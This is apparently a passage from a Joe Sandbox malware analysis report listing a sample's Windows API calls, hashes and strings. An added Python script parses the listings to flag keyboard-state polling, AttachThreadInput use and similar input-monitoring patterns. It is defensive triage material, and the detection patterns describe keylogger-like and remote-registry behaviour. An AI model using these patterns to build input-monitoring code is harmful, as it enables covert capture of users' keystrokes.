• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: State$Async$Keyboard
                                                                                                        • String ID:
                                                                                                        • API String ID: 541375521-0
                                                                                                        • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                                        • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                                                                        • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                                        • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
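The function above reads and rewrites the whole keyboard state (GetKeyboardState/SetKeyboardState) and then polls left Shift, right Shift, Ctrl, Alt and the left Windows key (virtual-key codes 0xA0, 0xA1, 0x11, 0x12, 0x5B) through both GetAsyncKeyState and GetKeyState, while the dialog-closing function earlier in this section calls GetWindowThreadProcessId followed by AttachThreadInput from a subcall. These are the API combinations an analyst scans such listings for when deciding whether a function observes or manipulates user input. The script below is an added triage helper, not part of the Joe Sandbox report and not code from the sample: it parses call lines in the listing format shown on this page and tags each "APIs" section. The virtual-key values are the documented Win32 constants; the tag names and the "three or more modifier keys" threshold are the script's own assumptions, and the sample input is constructed from call lines taken from this report.

```python
import re

# Documented Win32 virtual-key codes (winuser.h) for the modifier keys polled above.
MODIFIER_VKS = {
    0xA0: "VK_LSHIFT",
    0xA1: "VK_RSHIFT",
    0x11: "VK_CONTROL",
    0x12: "VK_MENU",    # Alt
    0x5B: "VK_LWIN",
}

# One listing line: optional "Part of subcall function XXXXXXXX:" prefix,
# then Api.MODULE(args) with an optional argument list, then "ref: <address>".
CALL_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][\w@:]*)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)
HEX_ARG_RE = re.compile(r"^-?[0-9A-Fa-f]{8}$")

# Headings that close a function's "APIs" section in the listing.
SECTION_END = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


def split_api_blocks(report_text):
    """Return one list of bullet lines per 'APIs' section."""
    blocks, current = [], None
    for raw in report_text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = []
            blocks.append(current)
        elif line in SECTION_END:
            current = None
        elif current is not None and line.startswith("•"):
            current.append(line)
    return blocks


def parse_args(args_text):
    """'000000A0,?,Function_00033D09' -> [0xA0, '?', 'Function_00033D09']."""
    parsed = []
    for arg in (args_text or "").split(","):
        arg = arg.strip()
        if arg:
            parsed.append(int(arg, 16) & 0xFFFFFFFF if HEX_ARG_RE.match(arg) else arg)
    return parsed


def parse_calls(block_lines):
    calls = []
    for line in block_lines:
        m = CALL_RE.search(line)
        if m:
            calls.append({"api": m.group("api"), "module": m.group("module"),
                          "args": parse_args(m.group("args")), "ref": m.group("ref"),
                          "subcall": m.group("sub")})   # callee address if nested
    return calls


def analyze_block(block_lines):
    """Tag one function with the input-monitoring patterns its calls exhibit (assumed tag names)."""
    calls = parse_calls(block_lines)
    apis = {c["api"] for c in calls}
    polled = set()
    for c in calls:
        if c["api"] in ("GetAsyncKeyState", "GetKeyState") and c["args"]:
            vk = c["args"][0]
            if isinstance(vk, int) and vk in MODIFIER_VKS:
                polled.add(MODIFIER_VKS[vk])
    findings = set()
    if len(polled) >= 3:                      # assumed threshold: Shift/Ctrl/Alt/Win sampled together
        findings.add("polls-modifier-keys")
    if {"GetKeyboardState", "SetKeyboardState"} <= apis:
        findings.add("rewrites-keyboard-state")
    if {"AttachThreadInput", "GetWindowThreadProcessId"} <= apis:
        findings.add("attaches-to-foreign-thread-input")
    return {"first_ref": calls[0]["ref"] if calls else None, "apis": sorted(apis),
            "modifiers": sorted(polled), "findings": sorted(findings)}


def analyze_report(report_text):
    return [analyze_block(b) for b in split_api_blocks(report_text)]


# Constructed sample: two "APIs" sections in the listing format, call lines taken from this report.
SAMPLE_REPORT = """\
APIs
• GetKeyboardState.USER32(?), ref: 00453CE0
• SetKeyboardState.USER32(?), ref: 00453D3B
• GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
• GetKeyState.USER32(000000A0), ref: 00453D75
• GetAsyncKeyState.USER32(00000011), ref: 00453DE1
• GetAsyncKeyState.USER32(00000012), ref: 00453E18
• GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
Memory Dump Source
APIs
• SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
• Sleep.KERNEL32(000000FA), ref: 00443C2D
  • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
  • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
• EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
Memory Dump Source
"""

if __name__ == "__main__":
    for result in analyze_report(SAMPLE_REPORT):
        print(result["first_ref"], result["findings"], result["modifiers"])
```

The same calls occur in legitimate GUI toolkits and script runtimes that query or synthesise modifier-key state, so the tags are a triage hint to be read alongside the behavioural signatures at the top of this report, not a verdict on their own.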
                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                                                                        • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                                                                        • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                                                                        • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                                                                        • String ID:
                                                                                                        • API String ID: 3096461208-0
                                                                                                        • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                                                        • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                                                                        • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                                                        • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                                                                        APIs
                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                                                                        • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                                                                        • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                                                                        • DeleteObject.GDI32(?), ref: 0047151E
                                                                                                        • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                                                                        • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                                                                        • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                                                                        • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                                                                        • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                                                                        • DeleteObject.GDI32(?), ref: 004715EA
                                                                                                        • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 3218148540-0
                                                                                                        • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                                        • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                                                                        • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                                        • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                        • String ID:
                                                                                                        • API String ID: 136442275-0
                                                                                                        • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                                                        • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                                                                        • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                                                        • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                                                                        APIs
                                                                                                        • _wcsncpy.LIBCMT ref: 00467490
                                                                                                        • _wcsncpy.LIBCMT ref: 004674BC
                                                                                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                        • _wcstok.LIBCMT ref: 004674FF
                                                                                                          • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                                                        • _wcstok.LIBCMT ref: 004675B2
                                                                                                        • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                                                        • _wcslen.LIBCMT ref: 00467793
                                                                                                        • _wcscpy.LIBCMT ref: 00467641
                                                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                        • _wcslen.LIBCMT ref: 004677BD
                                                                                                        • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                                                          • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                                                        • String ID: X
                                                                                                        • API String ID: 3104067586-3081909835
                                                                                                        • Opcode ID: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                                                                        • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                                                                        • Opcode Fuzzy Hash: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                                                                        • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                                                                        APIs
                                                                                                        • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                                                                        • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                                                                        • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                                                                        • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                                                                        • _wcslen.LIBCMT ref: 0046CDB0
                                                                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                                                                        • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                                                                        • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                                                                          • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                                                                          • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                                                                          • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                                                                        Strings
                                                                                                        • NULL Pointer assignment, xrefs: 0046CEA6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                                                                        • String ID: NULL Pointer assignment
                                                                                                        • API String ID: 440038798-2785691316
                                                                                                        • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                                                        • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                                                                        • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                                                        • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                                                                                        APIs
                                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                                                                        • _wcslen.LIBCMT ref: 004610A3
                                                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                                                                        • GetWindowRect.USER32(?,?), ref: 00461248
                                                                                                          • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                                                                        • String ID: ThumbnailClass
                                                                                                        • API String ID: 4136854206-1241985126
                                                                                                        • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                                                        • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                                                                        • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                                                        • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                                                                        APIs
                                                                                                        • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                                                                        • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                                                                        • GetClientRect.USER32(?,?), ref: 00471A1A
                                                                                                        • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                                                                        • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                                                        • String ID: 2
                                                                                                        • API String ID: 1331449709-450215437
                                                                                                        • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                                                        • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                                                                        • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                                                        • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                                        • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                                        • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                                        • __swprintf.LIBCMT ref: 00460915
                                                                                                        • __swprintf.LIBCMT ref: 0046092D
                                                                                                        • _wprintf.LIBCMT ref: 004609E1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                                                                        • API String ID: 3054410614-2561132961
                                                                                                        • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                                                        • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                                                                        • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                                                        • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                                                                        APIs
                                                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                                                                        • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                                                                        • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                        • API String ID: 600699880-22481851
                                                                                                        • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                                        • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                                                                        • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                                        • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
